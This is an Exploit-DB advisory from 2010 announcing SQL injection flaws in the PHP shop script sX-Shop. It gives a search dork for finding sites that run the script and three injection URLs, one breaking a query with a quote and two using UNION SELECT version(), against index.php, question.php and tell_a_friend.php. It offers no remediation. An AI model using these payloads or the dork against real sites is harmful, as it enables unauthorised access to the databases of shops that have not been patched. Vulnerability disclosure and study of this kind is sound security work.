sX-Shop - Multiple SQL Injections

EDB-ID:

14558

CVE:

N/A

Author:

CoBRa_21

Type:

webapps

Platform:

PHP

Published:

2010-08-05

########################################################################################

sX-Shop SQL Injection Vulnerabilities

########################################################################################

Author : CoBRa_21
Author Web Page :http://ipbul.org
Dork : "powered by sX-Shop"
Script Page : http://www.source-worx.de/

########################################################################################
 
Sql Injection :

http://localhost/[path]/index.php?product=_513' (Sql)
http://localhost/[path]/question.php?id=-513 union select version()  (Sql)
http://localhost/[path]/tell_a_friend.php?id=-500 union select version()  (Sql)

########################################################################################
Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR
########################################################################################